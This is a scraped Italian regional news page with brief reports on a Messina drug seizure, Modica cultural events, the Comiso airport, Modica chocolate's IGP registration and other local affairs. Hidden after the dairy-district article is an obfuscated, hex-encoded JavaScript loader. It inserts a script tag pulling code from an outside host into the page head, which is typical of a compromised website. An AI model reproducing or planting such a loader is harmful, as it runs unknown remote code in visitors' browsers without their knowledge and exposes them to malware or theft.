guardia finanza auto

Messsina, arrestati 2 corrieri della droga, sequestrata oltre 6 kg di marijuana

MESSINA (di Giulia Di Martino) – Oltre sei chili di  marijuana sono stati sequestrati a Messina dalla Guardia di Finanza che ha arrestato due corrieri. Il blitz è scattato agli imbarcaderi dei traghetti che collegano con la Calabria. La droga era trasportata all’interno di  due bagagli di passeggeri in transito, nascosta in sei involucri di cellophane, sigillati con nastro da imballaggio e imbevuti di profumo, nel tentativo di  sfuggire a un eventuale controllo dei cani antidroga. Durante i controlli effettuati dalle Fiamme gialle sui mezzi in transito nella città dello Stretto, i cani antidroga  Sara e Dandy hanno scoperto la sostanza stupefacente all’interno dei bagagli di due pullman provenienti dal Nord Italia. I corrieri della droga, un uomo e una donna di origine africana, sono stati arrestati in flagranza di reato per traffico di sostanze stupefacenti e successivamente condotti in carcere in attesa di  giudizio.  L’operazione testimonia il continuo impegno quotidiano delle Fiamme Gialle a difesa della legalità ed ha consentito di impedire l’emissione sul mercato dello spaccio di un considerevole quantitativo di droga, la cui vendita avrebbe fruttato notevoli guadagni illeciti.

 

Leggi tutto
quasimodo

Modica: Il Caffè Letterario Quasimodo programma i suoi “Sabati Letterari”

MODICA (di Elisa Montagno ) – In cantiere a Modica gli appuntamenti culturali del Caffè Letterario “Salvatore Quasimodo”, giunti alla loro XIII edizione. Il calendario della stagione 2018-2019 si snoderà in 16 appuntamenti culturali, i cosiddetti “sabati letterari” , distribuiti da ottobre a maggio, che si svolgeranno nell’Auditorium del Palazzo della Cultura.
Le tematiche della Stagione si muoveranno, come sempre, su tre versanti: il primo aperto ad un macrocosmo letterario con appuntamenti dedicati ai classici e ad autori della grande Letteratura: Dante, Pirandello, Sciascia, Bufalino ed autori che affrontano il tema della solidarietà nella letteratura.
Il secondo versante sarà dedicato ad incontri con autori contemporanei siciliani, tra i quali l’acese Salvatore Borzì con il suo racconto “L’alunno del tempo”; il ragusano Gino Carbonaro con il suo libro “Donna. Una storia senza eco”; il ragusano Emanuele Cavarra con il suo romanzo “Il brigante e il legionario”; il pozzallese residente ad Alessandria, Pietro Fronterrè con il suo romanzo “Splendida chimera”. Per la poesia in programma la presentazione delle pubblicazioni di Lucia Trombadore e Gianni Di Giorgio.
Ci sarà anche spazio per la musica, l’arte con la pittura di Guido Cicero, e per la letteratura locale, le tradizioni, i detti, i proverbi, gli aforismi e i “nniminàgghi” con serate dedicate ad autori modicani. Il terzo versante degli appuntamenti sarà sulle orme della memoria storica con incontri finalizzati a operare un recupero di scrittori del nostro territorio ibleo vissuti tra l’800 e il 900”.
“ Anche quest’anno – afferma Domenico Pisana, Presidente del Caffè Letterario Quasimodo – stiamo mettendo in cantiere questa XIII stagione culturale, la quale rappresenta la prosecuzione di una testimonianza di impegno civile e culturale a favore del territorio, ove ci piace fare della cultura una ‘espressione di vita’ che unisce esperienze e identità in un’ottica di inclusione. In questi anni il Caffè Letterario Quasimodo ha operato con questa filosofia di fondo perché ritiene che la cultura debba connotarsi come ‘spazio di senso’, come luogo nel quale si possono incrociare esperienze, sentimenti, riflessioni e idealità in grado di contribuire alla costruzione del tessuto relazionale del nostro tempo”.
Leggi tutto
aeroporto-comiso-151

Un tavolo tecnico-istituzionale per l’aeroporto di Comiso

COMISO (di Elisa Montagno) – Un tavolo tecnico istituzionale per monitorare e sviluppare azioni operative per lo sviluppo dell’aeroporto di Comiso. E’ stata la proposta emersa al termine dell’assemblea del partenariato socio-economico della provincia di Ragusa e dei rappresentanti istituzionali indetta dal Commissario straordinario del Libero Consorzio Comunale di Ragusa Salvatore Piazza e dal sindaco di Ragusa Giuseppe Cassì per avviare e sviluppare azioni operative a favore dell’aeroporto di Comiso. Dopo l’introduzione di Piazza e Cassì sull’opportunità di indire un’assemblea con tutti i rappresentanti del territorio accogliendo la proposta del deputato regionale Orazio Ragusa di costituire una cabina di regia su questa problematica, è stato l’amministratore delegato di Soaco Giorgio Cappello a fare il punto della situazione e a fotografare qual è la stato di salute di Soaco. Cappello ha annunciato che nella prossima riunione del Cda fissata per il prossimo 20 settembre sottoporrà ai soci un nuovo piano industriale ‘essenziale ed efficace’ ed entro la fine del mese presenterà il piano di ristrutturazione della Soaco che dovrebbe individuare la soluzione del ‘prestito ponte’ per mettere in sicurezza lo scalo ‘Pio La Torre’. Dal punto di vista gestionale.
Il sindaco di Comiso Maria Rita Schembari ha sottolineato nel suo intervento che l’aeroporto di Comiso “è di tutto il territorio anche se di proprietà del comune di Comiso e che il 35% delle quote è un patrimonio di tutti, a cominciare dai comuni di Chiaramonte Gulfi e Vittoria che hanno consentito col loro impegno (cessione del terreno per la pista per il primo comune e autorizzazione al sorvolo per il secondo) di realizzarlo e che in futuro non si trasformerà in un sito per bocciofili ma resterà una infrastruttura a servizio del territorio”.
Gli interventi dei parlamentari regionali Orazio Ragusa e Nello Dipasquale si sono concentrati sull’opportunità di ‘ricostruire il modello Ragusa’ e di fare fronte unico per salvare l’aeroporto di Comiso. Il deputato regionale Giorgio Assenza ha invitato tutti a valorizzare quest’importante infrastruttura, strategica per il territorio, senza criminalizzare una società che sta facendo di tutto per salvare lo scalo e che c’è l’impegno del governatore Musumeci a tenerla in vita qualora dovesse registrarsi irreversibilmente una difficoltà gestionale. Anche negli interventi Paolo Sanzaro (Cisl), Gianna Di Martino (Ugl) e Giovanni Iacono (Sosvi) l’impegno di fare quadrato per salvare lo scalo di Comiso. L’incontro si è chiuso con la proposta del tavolo tecnico-istituzionale composto dal commissario del Libero Consorzio di Ragusa, dai sindaci dei comuni di Ragusa e Comiso, da un rappresentante della Camera di Commercio del Sud-Est e da un rappresentante dell organizzazioni sindacali e delle associazioni datoriali di cui sono membri di diritto i parlamentari ragusani.
Leggi tutto
treni-storici-del-gusto-2018

Treno del Gusto. Domenica da Siracusa a Modica

MODICA (di Elisa Montagno) – Proseguono gli itinerari con i treni storici del gusto in Sicilia.
Domenica prossima, 9 settembre, dalla stazione di Siracusa, alle ore 9 partirà il Treno delle dolcezze di mandorla e miele e dei prodotti della terra, con destinazione Modica.
Il progetto dei Treni storici del gusto è stato curato dall’Assessorato Regionale del Turismo, dello Sport e dello Spettacolo, si avvale per questa tratta del patrocinio del Comune di Modica, ed è realizzato con la collaborazione della Fondazione Ferrovie dello Stato e Slow Food Sicilia, utilizzando i finanziamenti del Programma Operativo FESR Sicilia 2014/2020.
Il convoglio, composto da locomotiva storica D445, a cui saranno agganciate le caratteristiche carrozze centoporte, percorrerà i binari della ferrovia del barocco effettuando una prima fermata a Noto (9.30) per poi arrivare a Modica alle 13.00. In entrambe le località sono programmate delle visite guidate gratuite riservate ai passeggeri del treno storico.
A bordo treno, in un bagagliaio degli anni ’30, Slow Food Sicilia intratterrà i passeggeri con degustazioni di prodotti tipici della Sicilia.
I biglietti sono in vendita nelle biglietterie e self service di stazione, agenzie di viaggio abilitate e sutrenitalia.com. Sarà possibile acquistarli anche a bordo treno, senza alcuna maggiorazione di prezzo e in relazione alla disponibilità dei posti a sedere.
“Gli itinerari storici del gusto si sono rivelati uno strumento straordinario per il territorio, commenta l’assessore alla cultura, Maria Monisteri, in quanto coniugano due indirizzi culturali di successo: i beni architettonici e l’enogastronomia.
Modica è ricca di entrambi e su questo l’amministrazione ha deciso di puntare, dando l’adeguato contributo a questa manifestazione, per gli sviluppi ancora fortemente possibili convinti come siamo che il trend turistico in aumento poggia soprattutto su questi due elementi”.
Leggi tutto
file-12

Miss Contea 2018 a Modica, vincono Alessia Stella (Under 30) e Antonella Cicero (Over 40)

Miss Contea a Modica
MODICA (di Elisa Montagno)- Domenica in una Piazza Matteotti strapiena di spettatori, si è svolta la prima edizione di Miss Contea, il concorso di bellezza tutto modicano ideato da Daria Rizzone, diciannovenne studentessa di Scienze delle comunicazioni digitali e organizzato da Serena Belluardo con il supporto dell’Agenzia di comunicazione Found di Milano. E così come il sogno è diventato realtà per le due vincitrici (under 30, Alessia Stella e over 40, Antonella Cicero) che dalla normalità della vita quotidiana si sono ritrovate a sfilare in passerella davanti a centinaia di persone e ad indossare l’originale fascia di Miss Contea realizzata da “Lecosedigrazia”, anche per la giovane Daria Rizzone, l’idea di creare un evento cult da ripetere tutti gli anni nella sua città, con la collaborazione e la partecipazione dei modicani stessi, si è realmente concretizzata in un successo. Dopo quasi un anno di lavoro tra progettazione, programmazione, ricerca di sponsor, fasi di iscrizione e di preselezione, finalmente domenica anche questo sogno si è realizzato con un seguito di partecipazioni e pubblico che ha manifestato il suo apprezzamento durante la serata.
Leggi tutto
comune-di-modica_palazzo  San Domneico

Ordinanza del sindaco di Modica Abbate, il viadotto Caitina chiuso ai mezzi pesanti

MODICA (di Elisa Montagno) – Il Sindaco di Modica Ignazio Abbate ha firmato nelle scorse ore un’ordinanza circa il divieto di transito ai mezzi pesanti superiori alle 3 tonnellate e mezzo sul viadotto della popolosa zona della Caitina. La stessa prende spunto dalla relazione dell’Ufficio tecnico che ha segnalato un deterioramento dei copriferro delle strutture intelaiate. La struttura necessita urgenti interventi che prevede innanzitutto il rifacimento di tutto il calcestruzzo. Dunque i mezzi pesanti interessati dall’ordinanza dovranno usare percorsi alternativi per attraversare Modica durante di lavori di consolidamento del breve viadotto che scavalca la zona della Caitina e costituisce il collegamento con il ponte Guerrieri. L’ordinanza fa riferimento dunque ai soli mezzi pesanti e non agli altri veicoli vista comunque la buona salute del ponte.
Leggi tutto
CIOCCOLATO

Il cioccolato di Modica verso l’Igp

MODICA (di Elisa Montagno)- Nella sede del Consorzio di Tutela del cioccolato di Modica si è svolto il primo incontro con l’organismo di controllo in previsione della conclusione dell’iter di registrazione del marchio di tutela che dovrebbe, in assenza di opposizioni, concludersi il prossimo 8 agosto e cioè tre mesi dopo la pubblicazione della richiesta nella Gazzetta Ufficiale dell’Unione Europea C 159/32.
A tale proposito è inoltre utile precisare che, trascorso tale termine, la Commissione Europea pubblicherà il Regolamento di riconoscimento, mediamente nei 30 giorni successivi, che entrerà in vigore dopo 20 giorni dalla pubblicazione.
Ove pertanto non dovessero essere presentati dei ricorsi, verosimilmente il cioccolato di Modica diventerà IGP intorno al 30 settembre. Dalla data di esecutività della registrazione decorreranno gli adempimenti formali più importanti per le imprese.
Il Regolamento (UE) n. 1151/2012, relativo alla protezione delle indicazioni geografiche e delle denominazioni di origine, richiede che i prodotti agroalimentari che beneficiano di una DOP o di una IGP siano ottenuti in conformità al relativo disciplinare e che la verifica del rispetto dei requisiti disciplinati sia effettuata da autorità competenti e/o da organismi di controllo, conformi all’art. 36 e 37 del Reg. (UE) 1151/12, autorizzati dagli Stati Membri, in Italia dal MIPAAF.
Nel caso del Cioccolato di Modica il Consorzio, all’art. 7 del Disciplinare di Produzione, ha scelto il CSQA, quale organismo di controllo iscritto nell’elenco degli organismi di controllo per le DOP, IGP e STG autorizzati dal Ministero delle politiche agricole alimentari e forestali ai sensi dell’art. 14 della legge 526/99 e pertanto dovrà definirà il documento “Piano dei controlli”, quale guida per lo svolgimento delle attività di controllo di conformità per il prodotto IGP “Cioccolato di Modica”.
Il piano di controllo conterrà tutti gli elementi che caratterizzano il prodotto e descriverà l’insieme delle condizioni e dei controlli ai quali la filiera produttiva ed il prodotto devono essere sottoposti affinché possa essere identificato con la denominazione IGP “Cioccolato di Modica”, ed in particolare:
– la delimitazione della zona geografica nel cui territorio devono essere ubicati gli operatori;
– la descrizione del prodotto e delle caratteristiche finali;
– la descrizione del metodo di ottenimento;
– i sistemi di identificazione e rintracciabilità del prodotto;
– le modalità di presentazione al momento dell’immissione del prodotto al consumo/commercio;
– le procedure di controllo applicabili.
L’insieme complessivo dei controlli è costituito: sia dalle attività direttamente a carico dei soggetti interessati lungo la filiera di produzione disciplinata (attività di autocontrollo); sia dai controlli di conformità svolti da CSQA, al fine di accertare la completa conformità dei processi e dei prodotti.
Prima dell’inizio delle operazioni di produzione e confezionamento del prodotto, CSQA predispone ed effettua il controllo presso i laboratori di produzione e confezionamento per verificarne la rispondenza con i dati dichiarati sui moduli di adesione al sistema dei controlli, le reali condizioni di idoneità degli impianti e delle attrezzature a rispettare le prescrizioni del disciplinare, e la conformità del processo di produzione alle prescrizioni del disciplinare.
Gli operatori che non risulteranno in possesso dei requisiti previsti dal disciplinare, non sono iscritti al sistema dei controlli e non possono pertanto produrre per la IGP “Cioccolato di Modica”.
Nel corso dell’incontro il dott. Luca Valdetara di CSQA, che era assistito da due Ispettori, ha acquisito tutti gli elementi e fornito tutte le indicazioni utili per un rapido avvio delle procedure a cominciare dalla redazione del “Piano dei controlli” la cui prima stesura sarà pronta entro il prossimo mese di agosto; ha confermato, altresì, la volontà di stabilire con Il Consorzio un proficuo rapporto di collaborazione nel superiore interesse di tutte le aziende che si assoggetteranno al regime IGP.
Il Sindaco Ignazio Abbate ha espresso il suo compiacimento al Presidente Peluso e al Direttore Scivoletto per avere avviato anticipatamente la interlocuzione con il CSQA attraverso la quale è stato possibile definire un preciso cronoprogramma degli adempimenti cui tutte le imprese dovranno attenersi per la produzione, si auspica a decorrere dal prossimo mese di ottobre, del cioccolato di Modica a marchio IGP.
Leggi tutto
Lions

Studenti stranieri presenti a Modica

MODICA (di Elisa Montagno) – Conoscere altre culture e favorire la comprensione fra i popoli è tra gli scopi del Lions Clubs International che unisce oltre 48.000 clubs diffusi in tutto il mondo. E a tal fine il Lions Club ed il Leo Club di Modica dal 7 al 14 luglio 2018 stanno ospitando dei giovani studenti tra i 16 ed i 20 anni provenienti da quattro nazioni: Alyse dall’Australia, Steven e dalla Bulgaria, Deniz dalla Turchia e Caterine dal Belgio. La delegazione dei quattro ragazzi è stata accolta a Palazzo San Domenico per un saluto di benvenuto dal sindaco di Modica Ignazio Abbate. E’ seguita una cerimonia in cui il presidente del Lions Club di Modica Luigi Giarratana e la presidente del Leo Club Modica Diletta Ciarcià hanno consegnato ad Alyse, Deniz, Caterine e Steven dei guidoncini del Lions di Modica ed una cartolina commemorativa dell’evento. Nel corso della permanenza a Modica i quattro ragazzi stranieri hanno seguito una dimostrazione della preparazione della cioccolata di Modica presso l’Antica Dolceria Bonajuto, accompagnati dal titolare Pierpaolo Ruta, e visitato il patrimonio monumentale della città anche con una dettagliata visita del Duomo di San Giorgio dove ha suscitato particolare interesse la meridiana del Bernini. La delegazione dei quattro ragazzi ospiti a Modica il 14 luglio si unirà ad altri sessanta ragazzi provenienti da ventidue nazioni per un giro della Sicilia che si concluderà il 21 luglio a Petrosino in provincia di Trapani.
Leggi tutto
file-4

Il Commissario Piazza incontra i rappresentanti del distretto lattiero caseario

RAGUSA (di Elisa Montagno) – Il commissario straordinario del Libero Consorzio Comunale, Salvatore Piazza, ha ricevuto la visita dei rappresentanti Iblei del DiProSiLaC (Distretto produttivo lattiero caseario regionale), Enzo Cavallo, Saro Petriglieri ed Enzo Covato. Durante il cordiale incontro è stato fatto il punto sullo stato dell’arte dei Distretti in Sicilia e si è condivisa l’analisi che il loro destino è direttamente legato alla volontà ed alla capacità della Regione siciliana che deve dare concretezza ai propositi scaturenti dalla legge istitutiva ed alla valorizzazione di tali aggregazioni quali “cabina di regia” delle varie filiere produttive con particolare riferimento a quelle agroalimentari.
L’incontro è stato anche utile per chiarire che il DiProSiLaC, costituito nel 2008 e riconosciuto nel 2012, è scaduto nell’agosto del 2016 ma senza essere mai stato messo nelle condizioni di poter accedere ai fondi comunitari per il fatto che la Regione non ha emanato alcun bando cui poter partecipare nell’interesse delle imprese e della filiera. Dal confronto è emersa la volontà del Commissario Piazza di rilanciare il ruolo dei distretti e di quello lattiero caseario in particolare (tenuto conto dell’importanza produttiva, economica ed occupazionale della filiera per il territorio ibleo) e la disponibilità dell’ente non solo ad ulteriormente ospitare l’organismo nella propria sede ma altresì a coordinare le procedure e le azioni per procedere al rinnovo del “patto di sviluppo distrettuale” in sintonia con le altre province siciliane che manifesteranno il loro interesse e con gli altri Distretti Produttivi dell’Agroalimentare parimenti interessati. E’ stato deciso comunque di subordinare ogni passaggio agli esiti degli incontri istituzionali già concordati col Presidente della terza commissione Attività Produttive dell’Ars, Orazio Ragusa e gli assessori regionali all’Agricoltura Edy Bandiera e alle Attività Produttive Girolamo Turano.
“La Regione è chiamata a dare una prospettiva ai distretti produttivi istituiti con la legge regionale 17/2004 – afferma Salvatore Piazza – ed il Libero Consorzio Comunale è pronto a fare la sua parte per mettere i rappresentanti della filiera nella condizione di giungere al rinnovo del “patto distrettuale” riconosciuto dall’Assessorato Regionale delle Attività Produttive nel 2012 e del quale l’ex Provincia Regionale è stato Ente capo-fila. Personalmente credo di dover affrontare la questione direttamente col Presidente della Regione”.
“Il Distretto, oltre che per l’accesso ai fondi comunitari come avviene nelle altre Regioni, può fungere – dice Enzo Cavallo, a conclusione dell’incontro col Commissario Piazza – da “cabina di regia” di una filiera che ha tanto bisogno di un coordinamento istituzionale. Insieme ai rappresentanti degli altri Distretti siciliani dell’Agroalimentare intendiamo verificare la reale volontà del nuovo Governo Regionale”.

var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

Leggi tutto
shakalab-300x169 (1)

Capodanno in musica a Modica

MODICA (Di Elisa Montagno) – Saranno gli Shakalab a salutare il nuovo anno da Piazza Matteotti. A partire dalle ore 23 (ingresso gratuito) il salotto buono di Modica ospiterà la più importante espressione siciliana del reggae, reduce da innumerevoli successi collezionati in tutta Italia. Gli Shakalab sono il super collettivo del reggae siciliano formato dall’unione di quattro cantanti e un dj, da molto tempo attivi come solisti: Jahmento, Lorrè, DJ Delta, Br1 e Marcolizzo. Un progetto ricco di contaminazioni sonore che esplora tutte le sfumature del reggae fino ad arrivare all’hip hop, con centinaia di live in giro per l’Italia a supporto anche di artisti internazionali come Shaggy, Ky-Mani Marley, Barrington Levy e molti altri.
Ma la lunga notte di Capodanno a Modica non si ferma qui. Al termine del concerto partirà la discoteca all’aperto con il djset di Giovanni Veca che farà ballare fino a notte inoltrata tutti coloro che sceglieranno il centro storico modicano per trascorrervi l’ultima notte dell’anno.
Durante la serata ci sarà anche un gustoso intermezzo gastronomico. Rispettando la tradizione, verranno offerte lenticchie a tutti i presenti accompagnate da un bicchiere di vino e una fetta di panettone. A mezzanotte, infine, il tradizionale brindisi che aprirà il 2018.
Leggi tutto
TELERADIO REGIONE S.R.L., società a socio unico soggetta a direzione e coordinamento della Filgest srl, 97015 Modica – S.P. 74 km 0+400 C.da Cava Gucciardo – C.F. e P.IVA 00209070895 – Capitale Sociale Euro 2.255.000 i.v. - CCIAA / REA Ragusa 110483 – Testata Giornalistica igiornalidisicilia.it nr. 3/2012 del 26.04.2012 Tribunale di Modica